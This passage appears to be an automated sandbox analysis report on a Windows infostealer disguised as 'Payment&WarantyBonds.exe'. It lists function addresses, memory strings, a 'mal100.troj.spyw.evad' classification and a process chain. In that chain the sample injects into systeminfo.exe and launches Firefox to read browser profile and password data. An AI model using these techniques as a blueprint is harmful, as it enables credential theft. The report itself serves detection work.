                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C02_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E70E92_2_014E70E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EF0E02_2_014EF0E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141D34C2_2_0141D34C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EA3522_2_014EA352
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E132D2_2_014E132D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F03E62_2_014F03E6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E3F02_2_0143E3F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0147739A2_2_0147739A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D02742_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B2C02_2_0144B2C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D12ED2_2_014D12ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144D2F02_2_0144D2F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014352A02_2_014352A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E75712_2_014E7571
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014305352_2_01430535
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F05912_2_014F0591
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CD5B02_2_014CD5B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E24462_2_014E2446
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014214602_2_01421460
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EF43F2_2_014EF43F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DE4F62_2_014DE4F6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014547502_2_01454750
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014307702_2_01430770
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142C7C02_2_0142C7C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EF7B02_2_014EF7B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E16CC2_2_014E16CC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144C6E02_2_0144C6E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014399502_2_01439950
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B9502_2_0144B950
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014469622_2_01446962
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014329A02_2_014329A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014FA9A62_2_014FA9A6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014328402_2_01432840
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143A8402_2_0143A840
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D8002_2_0149D800
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014338E02_2_014338E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145E8F02_2_0145E8F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014168B82_2_014168B8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EAB402_2_014EAB40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EFB762_2_014EFB76
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E6BD72_2_014E6BD7
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A5BF02_2_014A5BF0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0146DBF92_2_0146DBF9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144FB802_2_0144FB80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EFA492_2_014EFA49
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E7A462_2_014E7A46
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A3A6C2_2_014A3A6C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DDAC62_2_014DDAC6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142EA802_2_0142EA80
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014CDAAC2_2_014CDAAC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01475AA02_2_01475AA0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01433D402_2_01433D40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E1D5A2_2_014E1D5A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E7D732_2_014E7D73
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143AD002_2_0143AD00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144FDC02_2_0144FDC0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142ADE02_2_0142ADE0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01448DBF2_2_01448DBF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01430C002_2_01430C00
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A9C322_2_014A9C32
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01420CF22_2_01420CF2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EFCF22_2_014EFCF2
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0CB52_2_014D0CB5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A4F402_2_014A4F40
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EFF092_2_014EFF09
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01472F282_2_01472F28
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01450F302_2_01450F30
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01422FC82_2_01422FC8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431F922_2_01431F92
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EFFB12_2_014EFFB1
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01430E592_2_01430E59
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EEE262_2_014EEE26
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EEEDB2_2_014EEEDB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01442E902_2_01442E90
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014ECE932_2_014ECE93
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01439EB02_2_01439EB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0481E4F67_2_0481E4F6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048144207_2_04814420
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048224467_2_04822446
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048305917_2_04830591
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047705357_2_04770535
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478C6E07_2_0478C6E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047707707_2_04770770
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047947507_2_04794750
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0476C7C07_2_0476C7C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048020007_2_04802000
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048241A27_2_048241A2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047F81587_2_047F8158
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048301AA7_2_048301AA
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048281CC7_2_048281CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047601007_2_04760100
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0480A1187_2_0480A118
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047F02C07_2_047F02C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048102747_2_04810274
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048303E67_2_048303E6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0477E3F07_2_0477E3F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482A3527_2_0482A352
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04810CB57_2_04810CB5
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04770C007_2_04770C00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04760CF27_2_04760CF2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0477AD007_2_0477AD00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0476ADE07_2_0476ADE0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0480CD1F7_2_0480CD1F
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04788DBF7_2_04788DBF
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482CE937_2_0482CE93
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04770E597_2_04770E59
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482EEDB7_2_0482EEDB
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482EE267_2_0482EE26
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04782E907_2_04782E90
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047E4F407_2_047E4F40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04790F307_2_04790F30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B2F287_2_047B2F28
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04812F307_2_04812F30
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04762FC87_2_04762FC8
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047EEFA07_2_047EEFA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047728407_2_04772840
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0477A8407_2_0477A840
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0479E8F07_2_0479E8F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047568B87_2_047568B8
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047869627_2_04786962
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0483A9A67_2_0483A9A6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047729A07_2_047729A0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0476EA807_2_0476EA80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04826BD77_2_04826BD7
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482AB407_2_0482AB40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047614607_2_04761460
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482F43F7_2_0482F43F
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0480D5B07_2_0480D5B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048275717_2_04827571
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048216CC7_2_048216CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482F7B07_2_0482F7B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0481F0CC7_2_0481F0CC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482F0E07_2_0482F0E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048270E97_2_048270E9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047770C07_2_047770C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0475F1727_2_0475F172
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047A516C7_2_047A516C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0477B1B07_2_0477B1B0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0483B16B7_2_0483B16B
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048112ED7_2_048112ED
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478D2F07_2_0478D2F0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478B2C07_2_0478B2C0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047752A07_2_047752A0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0475D34C7_2_0475D34C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482132D7_2_0482132D
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B739A7_2_047B739A
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047E9C327_2_047E9C32
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482FCF27_2_0482FCF2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04773D407_2_04773D40
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478FDC07_2_0478FDC0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04821D5A7_2_04821D5A
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04827D737_2_04827D73
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04779EB07_2_04779EB0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482FFB17_2_0482FFB1
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482FF097_2_0482FF09
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04733FD27_2_04733FD2
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04733FD57_2_04733FD5
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04771F927_2_04771F92
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047DD8007_2_047DD800
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047738E07_2_047738E0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047799507_2_04779950
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478B9507_2_0478B950
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_048059107_2_04805910
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047E3A6C7_2_047E3A6C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04811AA37_2_04811AA3
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0480DAAC7_2_0480DAAC
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0481DAC67_2_0481DAC6
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_04827A467_2_04827A46
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482FA497_2_0482FA49
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047B5AA07_2_047B5AA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047ADBF97_2_047ADBF9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_047E5BF07_2_047E5BF0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0482FB767_2_0482FB76
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0478FB807_2_0478FB80
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_00561CA07_2_00561CA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055CBF77_2_0055CBF7
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055CC007_2_0055CC00
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055CE207_2_0055CE20
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0055AEA07_2_0055AEA0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005653007_2_00565300
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005634F97_2_005634F9
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005635407_2_00563540
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0056353B7_2_0056353B
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0057B8D07_2_0057B8D0
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0465E73C7_2_0465E73C
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0465E2847_2_0465E284
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0465E3A37_2_0465E3A3
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0465D8087_2_0465D808
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 0149EA12 appears 86 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 0141B970 appears 250 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 01477E54 appears 93 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 014AF290 appears 103 times
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: String function: 01465130 appears 36 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 047A5130 appears 58 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 047EF290 appears 103 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 047DEA12 appears 86 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 0475B970 appears 262 times
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: String function: 047B7E54 appears 99 times
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1747632834.0000000004405000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1752667969.000000000B480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000000.00000000.1682657337.00000000006FC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000000.00000002.1745782038.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exe, 00000002.00000002.2063188272.000000000151D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exeBinary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe
                Source: Payment&WarantyBonds.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment&WarantyBonds.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, cILh9bHvx4dPN3VnUI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, cILh9bHvx4dPN3VnUI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, cILh9bHvx4dPN3VnUI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@18/14
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment&WarantyBonds.exe.logJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\systeminfo.exeFile created: C:\Users\user\AppData\Local\Temp\4648H9mUMJump to behavior
                Source: Payment&WarantyBonds.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Payment&WarantyBonds.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: systeminfo.exe, 00000007.00000003.2251386954.0000000000976000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4147496833.0000000000976000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Payment&WarantyBonds.exeReversingLabs: Detection: 23%
                Source: unknownProcess created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"Jump to behavior
                Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeSection loaded: uxtheme.dllJump to behavior
